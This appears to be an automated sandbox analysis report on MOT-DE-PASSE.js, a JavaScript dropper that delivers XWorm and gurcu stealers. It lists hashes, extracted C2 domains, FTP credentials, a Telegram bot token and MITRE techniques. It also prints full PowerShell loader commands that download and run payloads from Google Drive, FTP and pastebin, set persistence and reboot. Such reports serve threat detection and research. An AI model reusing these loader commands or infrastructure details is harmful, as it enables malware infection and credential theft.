Analysis
max time kernel: 146s
max time network: 148s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 20-09-2024 20:53

Static task: static1

Behavioral task: behavioral1
Sample: MOT-DE-PASSE.js
Resource: win7-20240903-en

Behavioral task: behavioral2
Sample: MOT-DE-PASSE.js
Resource: win10v2004-20240802-en
General
Target: MOT-DE-PASSE.js
Size: 24KB
MD5: 3568415c8644c0e6a231927bb26c3307
SHA1: 3cdece2baabd90c46b4b10d8fc14dfbbc7352651
SHA256: 914710d214497ca13da8f3ce50aae097c508ac9b45596c1728404a5a85258622
SHA512: 465238863185d29bede8da70f823d1ac78874768962a726b1262f65411547cd9d2502d78ea5633642b2a26cbeb754ea1c174d4fcf0229d99035fd5c0a98227fe
SSDEEP: 768:mUj6N48QwfUtVRd64neTcgc0N4DnW2N2Tcc4Hg/0IeSpQYQBcRRuv1mcifM+oQ4a:AfGefZD/MFiZ
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=
Extracted
Protocol: ftp
Host: ftp.desckvbrat.com.br
Port: 21
Username: desckvbrat1
Password: developerpro21578Jp@@
Extracted
xworm
5.0
moneyluckwork.ddns.net:7000
moneyluck.duckdns.org:7000
gGehVFEiZl8AfiDz
install_file: USB.exe
telegram: https://api.telegram.org/bot6063212727:AAGxI15ihXd3ydfdlrCIMNDRzM08Ew5M1gY/sendMessage?chat_id=1188038887
Extracted
gurcu
https://api.telegram.org/bot6063212727:AAGxI15ihXd3ydfdlrCIMNDRzM08Ew5M1gY/sendMessage?chat_id=1188038887
Signatures

Detect Xworm Payload (1 IoCs)
  resource: behavioral2/memory/4812-57-0x0000000000400000-0x0000000000410000-memory.dmp
  yara_rule: family_xworm

Credentials from Password Stores: Credentials from Web Browsers (1 TTPs)
Malicious Access or copy of Web Browser Credential store.

Blocklisted process makes network request (8 IoCs)
  flow  pid   Process
  10    4744  powershell.exe
  18    4744  powershell.exe
  20    4744  powershell.exe
  21    4744  powershell.exe
  24    4744  powershell.exe
  26    4744  powershell.exe
  29    4744  powershell.exe
  30    1048  powershell.exe

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
  description: Key value queried
  ioc: \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation
  Process: wscript.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application (2 TTPs, 1 IoCs)
  description: Set value (str)
  ioc: \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_x = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\wpnoa.ps1' \";exit"
  Process: powershell.exe

  pid   Process
  4356  powershell.exe
  4744  powershell.exe
  4080  powershell.exe
  1048  powershell.exe

Indicator Removal: File Deletion (1 TTPs)
Adversaries may delete files left behind by the actions of their intrusion activity.

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
  flow  ioc
  30    pastebin.com
  23    pastebin.com
  24    pastebin.com

Suspicious use of SetThreadContext (1 IoCs)
  description: PID 1048 set thread context of 4812
  pid: 1048
  Process: powershell.exe
  procid_target: 93

Command and Scripting Interpreter: JavaScript (1 TTPs)

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTPs, 1 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description: Key opened
  ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
  Process: RegAsm.exe

Suspicious behavior: AddClipboardFormatListener (1 IoCs)
  pid   Process
  4812  RegAsm.exe

Suspicious behavior: EnumeratesProcesses (11 IoCs)
  pid   Process
  4356  powershell.exe
  4356  powershell.exe
  4744  powershell.exe
  4744  powershell.exe
  4744  powershell.exe
  4080  powershell.exe
  4080  powershell.exe
  1048  powershell.exe
  1048  powershell.exe
  1048  powershell.exe
  4812  RegAsm.exe

Suspicious use of AdjustPrivilegeToken (5 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  4356  powershell.exe
  Token: SeDebugPrivilege  4744  powershell.exe
  Token: SeDebugPrivilege  4080  powershell.exe
  Token: SeDebugPrivilege  1048  powershell.exe
  Token: SeDebugPrivilege  4812  RegAsm.exe

Suspicious use of SetWindowsHookEx (1 IoCs)
  pid   Process
  4812  RegAsm.exe

Suspicious use of WriteProcessMemory (18 IoCs)
  description                       pid   Process         procid_target
  PID 1492 wrote to memory of 4356  1492  wscript.exe     82
  PID 1492 wrote to memory of 4356  1492  wscript.exe     82
  PID 4356 wrote to memory of 4744  4356  powershell.exe  84
  PID 4356 wrote to memory of 4744  4356  powershell.exe  84
  PID 4744 wrote to memory of 4080  4744  powershell.exe  87
  PID 4744 wrote to memory of 4080  4744  powershell.exe  87
  PID 4744 wrote to memory of 1048  4744  powershell.exe  91
  PID 4744 wrote to memory of 1048  4744  powershell.exe  91
  PID 4744 wrote to memory of 3592  4744  powershell.exe  92
  PID 4744 wrote to memory of 3592  4744  powershell.exe  92
  PID 1048 wrote to memory of 4812  1048  powershell.exe  93
  PID 1048 wrote to memory of 4812  1048  powershell.exe  93
  PID 1048 wrote to memory of 4812  1048  powershell.exe  93
  PID 1048 wrote to memory of 4812  1048  powershell.exe  93
  PID 1048 wrote to memory of 4812  1048  powershell.exe  93
  PID 1048 wrote to memory of 4812  1048  powershell.exe  93
  PID 1048 wrote to memory of 4812  1048  powershell.exe  93
  PID 1048 wrote to memory of 4812  1048  powershell.exe  93

Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js 1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1492
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $fLbjh = '[Base64-encoded command omitted]';$fLbjh = $fLbjh.replace('㍿','B') ;$fLbjh = [System.Convert]::FromBase64String( $fLbjh ) ;;;$fLbjh = [System.Text.Encoding]::Unicode.GetString( $fLbjh ) ;$fLbjh = $fLbjh.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js') ;powershell $fLbjh 2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4356
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$TQMdF = $host.Version.Major.Equals(2);If ( $TQMdF ) {$MiRId = [System.IO.Path]::GetTempPath();del ($MiRId + '\Upwin.msu');$RYEaF = 'https://drive.google.com/uc?export=download&id=';$sBiiW = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $sBiiW ) {$RYEaF = ($RYEaF + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$RYEaF = ($RYEaF + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yHJhx = ( New-Object Net.WebClient ) ;$yHJhx.Encoding = [System.Text.Encoding]::UTF8 ;$yHJhx.DownloadFile($URLKB, $MiRId + '\Upwin.msu') ;$AUrGF = ( 'C:\Users\' + [Environment]::UserName );IzjAQ = ( $MiRId + '\Upwin.msu' ) ; powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$hpxe = (New-Object Net.WebClient);$hpxe.Encoding = [System.Text.Encoding]::UTF8;$hpxe.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$VtaAF = $hpxe.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/02/DLL01.txt' );$hpxe.dispose();$hpxe = (New-Object Net.WebClient);$hpxe.Encoding = [System.Text.Encoding]::UTF8;$VtaAF = $hpxe.DownloadString( $VtaAF );[Byte[]] $RXiVj_YltHK = [System.Convert]::FromBase64String( $VtaAF.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $RXiVj_YltHK ).GetType( 'ClassLibrary3.Class1' ).GetMethod( 'prFVI' ).Invoke($null, [object[]] ( 'KQdVc6G6/war/moc.nibetsap//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js', 'true' ) );};" 3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4744
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1" 4⤵
- Adds Run key to start application
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4080
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\wpnoa.ps1" 4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1048
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" 5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4812
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\MOT-DE-PASSE.js" 4⤵
PID:3592
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
Credential Access
  Credentials from Password Stores (1)
    Credentials from Web Browsers (1)
  Unsecured Credentials (1)
    Credentials In Files (1)